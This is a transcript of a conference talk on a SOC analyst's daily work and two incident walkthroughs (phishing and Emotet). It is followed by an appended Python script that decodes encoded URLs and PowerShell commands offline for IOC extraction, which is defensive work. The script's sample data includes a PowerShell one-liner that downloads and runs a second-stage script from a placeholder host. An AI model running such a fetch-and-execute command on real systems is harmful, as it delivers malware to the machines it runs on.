
The Ticket To Adventure: A Security Analyst's Journey

BSides Basingstoke · 31:33 · 321 views · Published 2022-07
Style: Talk
About this talk
The Ticket To Adventure: A Security Analyst's Journey by B4nd1t0 https://twitter.com/B4nd1t0_
Transcript [en]

Good morning, Basingstoke!

Glad to be here, and glad to have you all here. I'm going to go over the life of a security analyst in our adventure, The Ticket to Adventure: A Security Analyst's Journey. I am your dungeon master and guide, so we'll be going over the prologue of the story: how the SOC has been envisioned, the roles and expectations involved with working at a SOC and being a SOC analyst, and the typical tools and expectations required. We'll even have some encounters where we get to fight the monster, and these are based off of real incidents that we've had. So the first step is always the scariest, but as a SOC analyst you're stepping into a

role of IT security, and there are responsibilities levied upon you for any problem where you are to help out the organization.

So, about me. Previously, before I worked at a SOC, I was with the military for I would say 14 years of my life; 12 years was enlisted, working from food service to military intelligence. Then I eventually left the military and worked as a civilian supporting cyber operations, either as a contractor or a government civilian, and then I was like, you know what, I want to be more hands-on, so I jumped out of the government entirely to do SOC analyst work for Secureworks. So I am a Senior Information Assurance Advisor. On the side I do video game development with a Starchase theme. I am with the Blue Team Village, Distinct

Pixels and Curated Intelligence, and my hobbies, as you can see, are all fantasy related, hence the way this is formed. We'll have time, so let's go over to the SOC and how SOCs are envisioned. So here you have the way that the military likes to depict it; it does look like that at times. And then for the civilian side, you either may go to this route at the very first, or you go to the middle, which is more like an office space; that's also very common. But now that we've moved to the virtual SOC with the pandemic and everyone working from home, you're still connected through the virtual environment but you're able to

support it, and that's thanks to the cloud services that enable the SOC to continue operations. So let's go over what a security operations center is and how it fits into the picture. It is the nexus of all security-related matters. It is the hub where everyone receives information, from either the telemetry or the people within the organization bringing forth issues such as default credentials in a repository or missing computers, and the SOCs are generally actually the coordinators with other organizations: they work with the vulnerability management team; in the SOC we work with the service desk and the Active Directory team; those will be key players when incidents happen. Now we want to look into how it fits

in. So the SOC is the eyes and ears, the extension of the policies. So all the governance and IT policies that happen, it supports the actual policies, just a computer means to it. So the SOCs use that telemetry to see what goes on in the network, and that will come into part of the day-to-day life of a SOC analyst. So we're going to look into this little graph here that goes into how the data is processed. So all the logs, endpoint data, everything is correlated, going from the preliminary investigation to the triaging; those have different layers, and that's where the tier processes come in. And that tier process, so when they said "I need a tier 1 SOC

analyst, tier 2 SOC analyst" or L1s and L2s, those actually go back to the IT terms for the IT service management levels in ITIL Foundation, because you're still providing a service as a SOC analyst. Now that tier zero is the automation; there's been a push to have most of those functions automated, but there's also the tier 1 side, the tier 1 analyst who takes that information, whether it is from the people that are calling in about it or the service desk or even the threat intel; it usually comes to them. While some actions can be automated, there's still also the need to have the user provide the interaction,

and then they'll start triaging which one looks more important that needs to go into investigation. That's where the tier 2 comes in. The tier 2 is the investigating arm; they will go over to prove it is either a false positive or it is something that needs to be escalated and responded to, but the tier 2 has the ability to do root cause analysis of why that alert happened, and sometimes it may be just an IT configuration. Now we've got the tier 3, who are the responders, so they handle the containing slash quarantining and pushing for the remediation, and they'll coordinate that update. Now, the reason why tier 3 aligns with tier 2 to a degree is

because tier 2 generally comes to tier 3 as the subject matter expert for guidance, so it's not always going to be escalation when it comes to going forth from tier 2 to tier 3. They'll ask for inputs from the tier 3 to help them with the investigation, and tier 2 can still finish it on their own. So that's why there's a bit of a blend between the extended investigation and the containment response. Now, it's not to say that tier 2 cannot respond as well; they're limited though. Surely what I've seen in environments has generally been related to emails that can be contained, but there are rare occasions when they can contain the host, but that's not normal.

Everything you do, keep a ticket. The ticket is what says you are the owner of the incident or the investigation, so if you do not have a ticket it did not count, because all the work you do, that is your receipt saying I've done this job, and that goes into metrics, which is the dreaded word for SOC analysts: metrics, or KPIs. Now let's meet our heroes. Now these are the components that are typically associated with a security operations center, typically and atypically, in different departments. Now the leftmost side are the typical side, from your security analysts, who are generally your L1 and L2 SOC analysts. The specialization tends to come into the digital forensics and incident responders

and threat hunters. You can count the security engineers as well, but the security engineers have a different role entirely in that component of the SOC, but they are still a huge component because they build those detections, and also the SOC can eventually pivot when they learn the environment long enough as well as the tooling. Now your atypical side are your threat intelligence analysts and your malware analysts, because those are specializations that sometimes the SOC may have, but most probably won't have directly, and from what I've seen it has always been in a different department. Then there are the red team or pen testers; pen testers are usually an external

organization, or if this is internal, it's still going to be in a different department. Each has their own particular skill set, as you see, and the most notable thing about them: so if you want to know the most notable thing about the security analyst, they detect; if you want to know the most notable thing about threat intelligence, they attribute what actor did it.

Now we go to the expectations of a SOC analyst. As I mentioned earlier, they are the technical eyes and ears of the policies, and in most cases, if the bad guy's in the network, they act as the cyber defense and drive the bad guy out of the network. And the most important thing that the SOC can bring to the table that helps the organization is bringing the recommended security controls. They are the ones that see a gap in the security measures, and that goes into why they must familiarize themselves with the policy that goes on in an organization. Each organization has a different set of priorities that they expect the SOC analyst to know and

maintain the order in the company, because the SOC is still part of security, just the cyber arm of it, and that actually fits in line with the user engagement of enforcing the policy. So there is still a customer service aspect to working at a SOC, so if you are not looking forward to talking to people, yeah, you're gonna have to buckle up on it, because that's part of a SOC analyst's role. Now, the technical expertise: it comes with knowing how to research, so knowing your OSINT, knowing your sources, being able to investigate, having that curiosity, being able to put those puzzles together. And another aspect of it is, as the technology impact evolves, you have to

evolve too, because new technologies are being brought in, like the cloud services. So if you are not smart on the cloud, that's going to be in your future; I'd start getting smart on the cloud infrastructure, because that's what's going to be expected for the SOC to monitor and protect. That's just an example of one; we've all seen GitHub's involved. Now the typical tools: you have your SIEM, which is your single pane of glass of metrics that are going on in the network. You see anomalies, and the L1 typically finds what looks more worthy of doing network traffic or worthy of investigating, so it is like this little dashboard here. And the SOAR, which is the

security orchestration, automation and response tool. It is useful; for now the app is typically advertised as the one-stop shop for automating all the functions of the security operations center, but realistically it's mostly used as a playbook in terms of what steps the SOC should be at, and note-taking of their actions, because while the various solutions do talk about what they can bring to the table, like automatic VirusTotal lookups, that's something we'll probably do manually regardless. Now endpoint solutions: you've heard of EDRs and XDRs, the endpoint detection and response and the extended detection and response. The key difference of that: the extended has networking data that it

brings in, but that's limited; I've mostly seen domain-related ones. There are some that will give you the telemetry of the actual URL, but that's very few and far between. And then you have your external tools like urlscan, VirusTotal, those awesome tools that will help you in the library. Now we go into the day-to-day cases that we handle as a SOC. Now the typical ones are always phishing, network monitoring, DLP support (data loss prevention). The key thing, like, the SOC's going to see day-to-day in their, um, check their email, see what tickets are going on; most of the things that have typically happened day-to-day are dealing with policy violations, whether someone

is sending an email that contains sensitive information to their personal email, that falls in line with data loss prevention support, or sometimes it's downloading unauthorized software, which can lead to a major incident because that unauthorized software may tend to have malware, or maybe trojanized malware, but in the end it goes back to the policy violations, because that's how that's become part of security gaps. Atypical cases: now these examples are pulled from the assistance of threat intelligence that the company has either internally or externally through some services, like a created website, credential theft, so investigating accounts being sold on the dark web, or third-party investigations, which is more of a partnership thing, and

making sure the company's data is not impacted by that loss, because ransomware is everywhere at this point; 2021 has been a year, and the ransomware in 2022 is going strong. And then stolen devices: devices get stolen, and the SOC's arm in this is just to make sure that, if the computer had data in it that is pertinent to the company, what data was lost. So those are some atypical sorts of cases, but it all goes back to having a ticket.

Now we go into the SOC encounters. Now the SOC encounters in this scenario: you are the tier 2 SOC, and I was working for a financial organization. The important consideration when handling these types of cases is when should you do the puzzle solving and when should you focus on the incident itself. So encounter one: phishing. The L1 identifies someone clicked on a malicious link flagged by the email security analytics. So we've got here, highlighted in red, that Yogurt clicked on something from Zeon Fanboy, that email. So what do we do? The first thing you always do in an investigation is validate: validate is it malicious, validate did they really click on it.

Mostly the important part is: is the site malicious? Because you already got the metrics telling me that there was a click. Now in order to do that you have to do some information gathering, so doing the surface level, finding out the originating email and also the scale of it. So how you get the original email: either the automation tool will give it to you, sometimes you've got to get the email itself from the user, or it is collected through third-party solutions. So we're going to use the Eye of Volcanon, that is our XDR and SIEM rolled into one; this gives us a god's-eye view into the network that we're protecting. So we've got the key artifacts here:

we've got the sender, recipient, subject of the email and the URL that was clicked, and a small render of what that email looked like: "Microsoft Security Warning: you have some undelivered emails; click to release to the inbox". So in order to do that we want to look at two things: either we investigate the email itself or investigate where the URL is going to. Because we're focusing on the incident itself and the timeliness of the maliciousness, we're going to investigate the URL itself first. So some internal... always use your internal tools first; whatever the company, whatever the organization gives you, use their tools first. However, some noteworthy tools that are useful externally: urlscan. Do the search function, because

someone may have already dealt with this before, and you can use that to get the time of when it probably started as well; that could be useful for the CTI team. Otherwise you can also use that to validate if it's malicious or not, if it's not been done before. Yeah, you may consider biting the bullet and being the first guinea pig to do the verification of the email. And there's also VirusTotal; that's also a useful one. Now, always do it in a sandbox if you are at work. However, do not use Browserling, because Browserling will have the URI that still has the email of the URL associated, which can be

flagged by the company. I've seen it happen; it's not pretty. It involves some talk, and those are not pretty. Now in this case it renders to a very suspicious credential harvester. The threat has been confirmed. Roll initiative!

Now we've got the phish, we've got the lead, and we've got the security analyst who has to react. Now it is the threat actor's first turn, and with that first turn he already has credentials, so he's gonna roll for being able to crack into the person's account. However, he rolled a four and he failed, because, why? Multi-factor authentication prevented him from being able to access the account. So now the SOC analyst has the ability to make their move and make the remediations before it gets worse. Now the response: you're in the response phase of an incident, so in this you're going to be containing. Now the containment part; actually, before we move to containment,

we still need to collect some information, so in order to get the impact, the recipients: in this case it's only been one person who received it, and if you had more, you prioritize on any clickers, and you can validate the logins with the proxy log; even the endpoint solutions can get a tracking of how many people clicked on it, but sometimes you choose whichever is faster. And then after you do that, you do the credential reset and purging of those emails. That was the turn of the SOC analyst.

Now, this is actually... so part of this has been a real response, but also this has been part of a real incident that had happened, I want to say about last year or so. The Chipotle emails were used as lures: someone compromised the messaging service that Chipotle uses, which is Mailgun, and that Mailgun account was used to send a mass marketing email to the people that are signed up with them, but it was a phishing email, and so that was a very big case. Now, now that the situation's been contained, you can do some post-incident analysis. So this is the time where you can go back into the puzzle-

solving side of things, because this information that's being collected can be sent to the CTI. Now some considerations: use a text editor, because in some cases, like... I will actually share a case that I had with Mailgun; it was used as an example because I had to deal with a case with that before, and a misstep on my part was that I opened up the email itself. Even though the image did not render, it still sent a callout to the tracker, but it was blocked by the proxy. But this would have been like a big notice to the bad guy, like, hey, either someone... they got some clickers, or if

they know something that is more than usual, someone's probably doing some analysis. So always try to render with the text editor, and review offline too, so you don't get exposed on that tracker. And yeah, also pay attention to custom headers, because that's going to be important in identifying what tool was used. So a bit of extra credit, or bonus stage... oh no, we'll call this extra credit for now. So for the extra credit, in this case we look at the example here for the headers: it was using the SPF and DKIM pass for Chipotle, and then at the very bottom is where you see the Mailgun custom headers. So Mailgun custom headers are useful

to know what tool is being used; it's not used for attribution, because in this case that IP address goes back to Mailgun instead of the bad guy who used it, but it's good to know what tools were leveraged during that. Now we've got to go to the bonus stage. So remember that URL that we saw, that was clicked on? Well, most of those URIs are generally written in base64; either it's written in base64 or base64 deflated, so we're going to resolve this to see where it was going to, because that can actually reveal the extra IOC involved with this. So we're going to use CyberChef. CyberChef is

definitely an awesome tool that every SOC analyst should have in their repository. Now if you are within the company, it's probably recommended to see if you can have it on a server of your own or in your IT; that way the company data does not go out to the cloud. Now for this case we're going to put the URI in, everything that began, and then, to cheat a bit, I use Magic, and then for that I want to do a zlib inflate. We get an extra set of IOCs that it goes out to. Oh, pause for a little breather; see the cute little critter throwing all my weapons away.

Say hi to the Mimic; it'll be guarding my stuff. Okay, now we'll move to encounter two. Encounter two: hours after dealing with the phishing campaign, it seemed like it was time to rest, but this time an alert picks up on the SIEM regarding a suspicious process on a business laptop. So here you now see Microsoft Office spawning an abnormal process. We go back to the Audible Comment to research what's going on. You can already see in here the user that was involved, Speedy Hedgehog, and the PowerShell script that triggered; here's the PowerShell. So we go back to our old friend CyberChef. CyberChef is useful to help us, and we're going to render it,

do our search. We picked up some IOCs that are associated; you see here that's going out to various domains or various URLs, so it can pull out the file destinations. Draken Fern, roll initiative! This time the threat's even bigger: we've got Emotet. Now Emotet takes his first attack on the L2 SOC analyst. L2 is exhausted, so it pulls in the L3. The L3 SOC analyst gets involved, and they are still called in to support the L3, because we need to know the scope, so the L2 can handle the continuous scoping and L3 handles the response. In that response the L3 takes their actions to isolate the host

as well as temporarily disable the user account and notify the appropriate stakeholders. Now this is something that can be done at a local host level, because at the host level, the endpoint, that one is low impact compared to, say, a server that would require a bigger escalation, bigger key players to involve. But in this case, because this is low impact, the containment can be handled by the analysts themselves. So that was the response taken on here. Now I mentioned before about root cause analysis; this is something that the SOC can bring to the table. Now earlier in this example there was not an Office exe used with the Excel; that was not one of the artifacts,

so further forensics had to be used. In this case we find out that the person accessed their Gmail account, which was how they accessed the phishing malware, which, if you see here, is a password-protected file, and it's doing a reply. This is typically part of the Emotet TTPs, where it's email hijacking with the password, and the policy recommendation: prevent access to non-work emails. That's something that the SOC can bring to the table; that's a recommended policy change. Now this is based off a February Emotet campaign that occurred. Victory! So, skill building and progression. If you are looking to progress, there is accessible blue team training with TryHackMe, Blue Team Level 1; Blue Team

Level 1 even offers certification out of it, and also John Strand's Pay What You Can; that one is very phenomenal, and I recommend you take it. Now some cyber ranges that are available: you have TryHackMe, RangeForce, LetsDefend, and I mentioned the Blue Team, and they even have an online labs range. Now if you have some personal setups, you can do CyberDefenders, which has various things such as malware analysis, work with the SIEMs for threat hunting and incident response type roles, and SOCVel, which has some personalized VMs, but you need to set up your own labs for that, whereas the other ones... the skill progressions. So I'll close this out. So if you, as a, from a senior SOC

analyst to the junior side, I generally recommend that if you do get access to an environment, try to learn it, because some SOCs are being rolled into having multiple clients, so it's harder to see their environments. Documented processes, if it's effective, so junior analysts can be able to jump in when they are onboarded. Knowledge sharing is caring, so events like this, this is a chance to share that knowledge, and the SOC analyst is never alone: they are working with that service desk team, they're working with the Active Directory team, the vulnerability management team in these cases. That's it for the story, but that's okay. These are special thanks to the people who contributed to art

for the projects; almost all of the art was custom made, and this is me.

That's the end.
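Editor's added example, not part of the talk and not the speaker's code. The "bonus stage" above resolves a clicked URL whose parameter is base64, or base64 of a deflate stream, with CyberChef's Magic and Zlib Inflate, and encounter two renders an encoded PowerShell command the same way. The Python below does those decodes offline, which addresses the concern raised about company data leaving for a cloud-hosted CyberChef: it walks the query values and path segments of a clicked URL, tries plain base64, base64 of UTF-16LE text (PowerShell's -EncodedCommand) and base64 of a raw-deflate, zlib or gzip stream, and pulls URL and domain IOCs out of whatever decodes. The redirector, the example.invalid hostnames, the user name and the encoded values are all constructed for this example; they are not artifacts from the incidents described.

```python
"""Offline decoding of the encoded artifacts seen in the talk's encounters:
base64 / base64+deflate redirect parameters in a clicked phishing URL, and a
base64 UTF-16LE PowerShell -EncodedCommand. Added example, not the speaker's
code; every host, name and payload below is constructed."""
from __future__ import annotations

import base64
import binascii
import re
import zlib
from urllib.parse import parse_qsl, urlsplit

# Stops at whitespace, quotes, angle brackets and parentheses so a URL quoted
# inside a PowerShell one-liner does not drag the closing quote along.
URL_RE = re.compile(r"https?://[^\s\"'<>()]+", re.IGNORECASE)


def _b64_decode(blob: str) -> bytes | None:
    """Decode standard or URL-safe base64, repairing stripped '=' padding."""
    s = blob.strip().replace("-", "+").replace("_", "/")
    s += "=" * (-len(s) % 4)
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def _is_text(data: bytes, encoding: str) -> bool:
    """True if data decodes cleanly and contains only printable characters."""
    try:
        text = data.decode(encoding)
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in "\r\n\t" for ch in text)


def _inflate(data: bytes) -> bytes | None:
    """Raw deflate (CyberChef 'Raw Inflate') first, then zlib/gzip ('Zlib Inflate')."""
    for wbits in (-15, 47):  # -15: raw deflate; 47 = 32+15: auto-detect zlib or gzip header
        try:
            return zlib.decompress(data, wbits)
        except zlib.error:
            continue
    return None


def decode_blob(blob: str) -> tuple[str, str] | None:
    """Return (encoding, text) for a blob that is base64 of UTF-8 text, base64 of
    UTF-16LE text (PowerShell -EncodedCommand) or base64 of a deflate stream.
    Returns None when none of those fits, much as CyberChef's Magic reports
    nothing when it finds no plausible recipe."""
    raw = _b64_decode(blob)
    if raw is None or len(raw) < 4:
        return None
    if _is_text(raw, "utf-8"):
        return "base64", raw.decode("utf-8")
    # ASCII text stored as UTF-16LE has a NUL byte in every odd position.
    if len(raw) % 2 == 0 and not any(raw[1::2]) and _is_text(raw, "utf-16le"):
        return "base64+utf16le", raw.decode("utf-16le")
    inflated = _inflate(raw)
    if inflated is not None and _is_text(inflated, "utf-8"):
        return "base64+deflate", inflated.decode("utf-8")
    return None


def extract_iocs(text: str) -> dict[str, list[str]]:
    """Pull URLs and their hostnames out of decoded text."""
    urls = URL_RE.findall(text)
    domains = sorted({h for h in (urlsplit(u).hostname for u in urls) if h})
    return {"urls": urls, "domains": domains}


def analyse_url(clicked: str, min_len: int = 16) -> dict[str, dict]:
    """Try every query value and path segment of a clicked URL as an encoded
    payload; report the ones that decode, with the IOCs they reveal."""
    parts = urlsplit(clicked)
    candidates: list[tuple[str, str]] = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        candidates.append((f"query:{key}", value))
    for i, seg in enumerate(parts.path.split("/")):
        if seg:
            candidates.append((f"path[{i}]", seg))
    findings: dict[str, dict] = {}
    for where, blob in candidates:
        if len(blob) < min_len:  # short values are ids or flags, not payloads
            continue
        decoded = decode_blob(blob)
        if decoded is not None:
            encoding, text = decoded
            findings[where] = {"encoding": encoding, "decoded": text, "iocs": extract_iocs(text)}
    return findings


# --- Constructed sample data (not from the talk) ------------------------------
FINAL_DESTINATION = "https://login-verify.example.invalid/owa/?user=yogurt@example.invalid"


def _raw_deflate_b64(text: str) -> str:
    """Build a redirector parameter as base64(raw deflate(text)), URL-safe, unpadded."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    data = comp.compress(text.encode()) + comp.flush()
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


SAMPLE_CLICKED_URL = "https://redirect.example.invalid/track?id=12345&q=" + _raw_deflate_b64(FINAL_DESTINATION)

# Encounter two: a constructed downloader one-liner as PowerShell carries it in -EncodedCommand.
SAMPLE_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/stage2.ps1')"
SAMPLE_ENCODED_COMMAND = base64.b64encode(SAMPLE_COMMAND.encode("utf-16le")).decode()

if __name__ == "__main__":
    for where, finding in analyse_url(SAMPLE_CLICKED_URL).items():
        print(where, finding["encoding"], finding["decoded"], finding["iocs"]["domains"])
    print(decode_blob(SAMPLE_ENCODED_COMMAND))
```

Run it with no arguments to see the redirector's `q` parameter resolved to the credential-harvester URL and the encoded command rendered back to text; point `analyse_url` at a real clicked URL from the email telemetry to get the same result without the payload ever leaving the analyst's host. Anything it returns is still only a decoded string: confirm the destination in a sandbox or with urlscan's search before treating it as an IOC, as the talk advises.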